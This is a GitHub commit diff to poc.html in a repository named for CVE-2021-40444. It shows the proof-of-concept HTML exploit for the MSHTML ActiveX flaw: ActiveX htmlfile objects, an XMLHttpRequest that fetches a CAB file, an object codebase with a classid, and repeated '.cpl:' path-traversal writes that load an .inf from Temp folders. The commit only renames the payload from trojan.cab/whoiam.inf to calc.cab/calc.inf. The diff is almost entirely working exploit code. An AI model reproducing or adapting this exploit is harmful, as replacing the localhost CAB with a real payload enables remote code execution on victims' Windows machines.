STRLCPY/CVE-2021-40444-Sample

Update poc.html
lulz committed with GitHub 3 years ago

e87dd82b

1 parent f3895ba8

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

Total 1 files

■ ■ ■ ■ ■ ■

poc.html

		skipped 37 lines
38	38		actx_html_5=new ActiveXObject('htmlfile'),
39	39		xmlhttpreq1=new window['XMLHttpRequest'](),
40	40		window['setTimeout']=window['setTimeout'];
41		-	window['XMLHttpRequest']['prototype']['open']['call'](xmlhttpreq1,'GET','http://localhost/trojan.cab',![]),
	41	+	window['XMLHttpRequest']['prototype']['open']['call'](xmlhttpreq1,'GET','http://localhost/calc.cab',![]),
42	42		window['XMLHttpRequest']['prototype']['send']['call'](xmlhttpreq1),
43	43		iframeActxHtml4['Script']['document']['write']('&lt;body>');
44	44		var cabloadunpack=window['Document']['prototype']['createElement']['call'](iframeActxHtml4['Script']['document'],'object');
45		-	cabloadunpack['setAttribute']('codebase','http://localhost/trojan.cab#version=5,0,0,0');
	45	+	cabloadunpack['setAttribute']('codebase','http://localhost/calc.cab#version=5,0,0,0');
46	46		cabloadunpack['setAttribute']('classid','CLSID:b7771b25-4e74-4168-add9-04062d629d9a'),
47	47		window['HTMLElement']['prototype']['appendChild']['call'](iframeActxHtml4['Script']['document']['body'],cabloadunpack),
48	48		actx_html_0['Script']['location']='.cpl:123',
		skipped 5 lines
54	54		actx_html_0['Script']['location']='.cpl:123',
55	55		actx_html_0['Script']['location']='.cpl:123',
56	56		actx_html_0['Script']['location']='.cpl:123',
57		-	actx_html_0['Script']['location']='.cpl:../../../AppData/Local/Temp/Low/whoiam.inf',
58		-	actx_html_1['Script']['location']='.cpl:../../../AppData/Local/Temp/whoiam.inf',
59		-	actx_html_2['Script']['location']='.cpl:../../../../AppData/Local/Temp/Low/whoiam.inf',
60		-	actx_html_3['Script']['location']='.cpl:../../../../AppData/Local/Temp/whoiam.inf',
61		-	actx_html_4['Script']['location']='.cpl:../../../../../Temp/Low/whoiam.inf',
62		-	actx_html_3['Script']['location']='.cpl:../../../../../Temp/whoiam.inf',
63		-	actx_html_3['Script']['location']='.cpl:../../Low/whoiam.inf',
64		-	actx_html_3['Script']['location']='.cpl:../../whoiam.inf';
	57	+	actx_html_0['Script']['location']='.cpl:../../../AppData/Local/Temp/Low/calc.inf',
	58	+	actx_html_1['Script']['location']='.cpl:../../../AppData/Local/Temp/calc.inf',
	59	+	actx_html_2['Script']['location']='.cpl:../../../../AppData/Local/Temp/Low/calc.inf',
	60	+	actx_html_3['Script']['location']='.cpl:../../../../AppData/Local/Temp/calc.inf',
	61	+	actx_html_4['Script']['location']='.cpl:../../../../../Temp/Low/calc.inf',
	62	+	actx_html_3['Script']['location']='.cpl:../../../../../Temp/calc.inf',
	63	+	actx_html_3['Script']['location']='.cpl:../../Low/calc.inf',
	64	+	actx_html_3['Script']['location']='.cpl:../../calc.inf';
65	65		}();
66	66		</script>
67	67		</body>
68	68		</html>
	69	+

Update poc.html